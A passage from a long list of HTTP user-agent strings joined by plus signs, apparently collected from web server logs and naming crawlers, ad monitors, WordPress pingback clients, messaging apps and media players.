UAEmdDd8mTixKaYQuYcdmRlddmO3YRDvUxg) +Apache-HttpClient/4.5.5 (Java/1.8.0_275) +Botbox TV/1.0 (Linux;Android 6.0.1) ExoPlayerLib/2.11.3 +Botbox TV/1.0 (Linux;Android 11) ExoPlayerLib/2.11.3 +Botbox TV/1.0 (Linux;Android 7.0) ExoPlayerLib/2.11.3 +Botbox TV/1.0 (Linux;Android 9) ExoPlayerLib/2.11.3 +WordPress/5.6.3; https://www.gmass.co/blog +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619483999-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619486749-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619494010-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +WhatsApp/2.21.9.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619537567-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619560391-0 +WordPress/5.7.1; https://favoritedishes.ru +Botbox TV/1.0 (Linux;Android 5.1.1) ExoPlayerLib/2.11.3 +Botbox TV/1.0 (Linux;Android 7.1.2) ExoPlayerLib/2.11.3 +Botbox TV/1.0 (Linux;Android 10) ExoPlayerLib/2.11.3 +Botbox TV/1.0 (Linux;Android 5.0) ExoPlayerLib/2.11.3 +okhttp/4.9.1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619570084-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619577695-0 +WordPress/5.6.3; http://xrds.ayz.pl/wikipedia +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619612632-0 +WordPress/5.7.1; https://crmnewsbrief.com +WordPress/5.7.1; https://www.sfnewsbrief.com +WhatsApp/2.21.8.17 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619612634-10 +WordPress/4.9.17; https://www.seismicthemes.com; verifying pingback from 192.40.220.138 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619569237-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619622603-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619573996-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619579960-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619619582-0 +WhatsApp/2.21.9.7 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619642066-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619653010-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 PTST/210419.211328 +Botbox TV/1.0 (Linux;Android 8.1.0) ExoPlayerLib/2.11.3 +CaptiveNetworkSupport-355.270.2 wispr +WordPress/5.7.1; http://paulwright.id.au +WhatsApp/2.21.9.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619701288-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619716948-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619718233-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619701300-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619698358-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619698360-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619706406-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619711094-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619711093-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619734258-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 PTST/210428.170916 +ArchiveTeam ArchiveBot/20210323.877335e (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +Scrapy/2.5.0 (+https://scrapy.org) +yacybot (/global; amd64 Linux 4.15.0-142-generic; java 11.0.11; Europe/en) http://yacy.net/bot.html +TuneIn Radio/18.1 (Android 24; MEIZU M6; Java) +Botbox TV/1.0 (Linux;Android 5.1) ExoPlayerLib/2.11.3 +Jersey/2.29.1 (HttpUrlConnection 11) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619815809-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619744229-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619755289-0 +WhatsApp/2.2114.10 N +WordPress/5.7.1; https://rusrappers.ru +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 PTST/210429.152038 +GuzzleHttp/6.2.1 curl/7.19.7 PHP/5.6.40 +Snapchat/11.25.0.29 (iPhone11,8; iOS 14.4.2; gzip) +WordPress/5.7.1; https://geopressa.ru EWWW/613 +WhatsApp/2.21.80.17 i +Java/1.8.0_292 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Mobile Safari/537.36 PTST/210429.152038 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619882471-10 +WhatsApp/2.21.9.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619907056-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619832070-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1619837731-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619838404-0 +WordPress/5.7.1; https://archives.igelcommunity.com +WhatsApp/2.21.6.18 A +WordPress/5.7.1; https://porno-francais.site +Botbox TV/1.0 (Linux;Android 8.0.0) ExoPlayerLib/2.11.3 +Botbox TV/1.0 (Linux;Android 10.0) ExoPlayerLib/2.11.3 +WordPress/4.9.17; http://www.anatanani.com; verifying pingback from 107.150.52.130 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.97 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7.1; https://loeliges.com; verifying pingback from 173.245.85.113 +WordPress/5.7.1; https://creativelinkers.info +WordPress/5.7.1; https://masterlinkers.info +WordPress/5.7.1; https://brilliantlinkers.info +WordPress/5.7.1; https://rozee.info +WordPress/5.7.1; https://audioplugins.xyz +WordPress/5.7.1; https://supersoftonic.xyz +WordPress/5.7.1; https://fixintopc.xyz +WordPress/5.7.1; https://softlay.pro +WordPress/5.7.1; https://getintopc.pro +WordPress/5.7.1; https://ideapeoples.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619984552-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.2; GT-S5360 ) U2/1.0.0 Mobile +WhatsApp/2.21.8.18 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619991865-0 +Python/3.9 aiohttp/3.7.3 Crosslink/2 +Botbox TV/1.0 (Linux;Android 7.1.1) ExoPlayerLib/2.11.3 +WordPress/5.7.1; https://0xzx.com +WordPress/4.9.7; http://www.qkl315.cn +WordPress/5.5.1; https://www.readblocks.com +WordPress/5.7.1; https://top-digitalmarketing.com +WordPress/5.4.5; https://youngstownangels.com; verifying pingback from 149.202.144.35 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620062558-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620073790-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620082864-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620082845-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620050254-0 +Java/16.0.1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620056553-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620056555-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 6.0; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620072227-0 +WhatsApp/2.21.8.15 A +WordPress/5.7.1; http://share.lallaa.vn +WordPress/4.9.17; https://htzkw.com +WordPress/4.9.17; http://www.pakistanhandicraft.com; verifying pingback from 2.59.21.169 +WordPress/5.1.9; http://labmundo.org; verifying pingback from 104.227.223.150 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620088958-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620097685-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620165785-10 +WhatsApp/2.21.10.1 A +WhatsApp/2.21.10.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620091237-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620091769-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620091256-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620093574-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620093576-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620098854-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620162772-0 +WhatsApp/2.21.81.1 i +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.130 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7.1; http://moodio.fm +WordPress/5.7.1; https://vips-news.ru +yacybot (-global; amd64 Linux 5.11.8-gentoo-x86_64; java 1.8.0_252; Europe/en) http://yacy.net/bot.html +FDM/6.14.1.3935 +curl/7.76.1 Dalvik/2.1.0 +WordPress/5.7.1; http://www.ducaticlubperugia.com; verifying pingback from 14.225.5.68 +PycURL/\x227.43.0.5\x22 libcurl/7.68.0 OpenSSL/1.1.1g zlib/1.2.11 c-ares/1.15.0 libssh2/1.9.0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Proxy; Android 5.1.1; SM-J320G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620219021-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620244358-10 +WhatsApp/2.21.10.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620219043-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620178263-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620186461-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/89.0.4389.130 Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Mobile Safari/537.36 PTST/210505.150550 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.44 (KHTML, like Gecko) JavaFX/8.0 Safari/537.44 +WordPress.com; https://thisthateverything2020.wordpress.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 7.1.2; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1620255694-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 PTST/210505.150550 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/90.0.4430.97 Mobile Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/90.0.4430.97 Safari/537.36 +WordPress/5.5.3; http://ustelcom.us +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1.1; SM-N910H ) U2/1.0.0 Mobile +WordPress/5.5.4; https://skitraxx.com +WordPress/5.5.4; https://datasearchsystems.com +WordPress/5.5.4; https://dynagensystems.com +WordPress/5.5.4; https://ptedistribution.com +WordPress/5.5.4; https://multimedia-furniture.com +WordPress/5.5.4; https://l50m.com +WordPress/5.5.4; https://e-watertechnologies.com +WordPress/5.5.4; https://faithhopecharityrace.com +WordPress/5.5.4; https://cardinal-imaging.com +WordPress/5.5.4; https://bridgerstoves.com +WordPress/5.5.4; https://nthgencomp.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620264029-10 +curl/7.65.1-DEV +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620263084-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620271567-0 +WhatsApp/2.21.9.9 A +WhatsApp/2.21.10.4 A +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 6.0; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/ +Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/606.1 (KHTML, like Gecko) JavaFX/8.0 Safari/606.1 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1620345101-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 8.1.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 6.0.1; AS-5433_Secret ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620348083-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620356145-0 +WhatsApp/2.21.10.6 A +WhatsApp/2.2117.5 N +WordPress/5.7.1; https://askphpquestions.com +WordPress/4.9.17; http://xn--u9j8hyc6dy60p3qak6ae42drk6k.sf.calore-fukui.com; verifying pingback from 192.40.220.138 +WordPress/5.7.1; https://athomeinspections.net; verifying pingback from 192.40.220.138 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620349080-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620400582-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620350186-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620357144-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620368665-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620395219-0 +Mozilla/5.0 (Windows; rv:26.0) Gecko/20100101 Firefox/26.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620406423-0 +yacybot (-global; amd64 Linux 3.13.0-61-generic; java 1.7.0_79; Europe/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620398207-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620398208-0 +Mozilla/5.0 (compatible; pingbot/2.0; +http://www.pingdom.com/) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.97 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620398177-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620398207-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620398177-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620398208-10 +Snap URL Preview Service; bot; https://developer.snapchat.com/robots +WordPress/4.2.29; http://ehvenword.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620503179-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620503223-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620434570-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620443801-0 +WhatsApp/2.21.9.11 A +Friendica 'Siberian Iris' 2021.06-dev-1414; https://squeet.me +Friendica 'Siberian Iris' 2021.04-1413; https://libranet.de +Mozilla/4.0 (compatible; grub-client-1.3.7; Crawl your own stuff with http://grub.org) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +GoogleAuth/1.4 (mdh30lm QKQ1.200730.002); gzip,gzip(gfe),gzip(gfe) +yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_95; Europe/en) http://yacy.net/bot.html +WordPress/5.5.4; https://www.trionds.com; verifying pingback from 109.224.54.18 +WordPress/5.7.1; https://gidnenuzen.ru +WordPress/5.7.1; http://lesoutrali.com/fr +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620601074-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 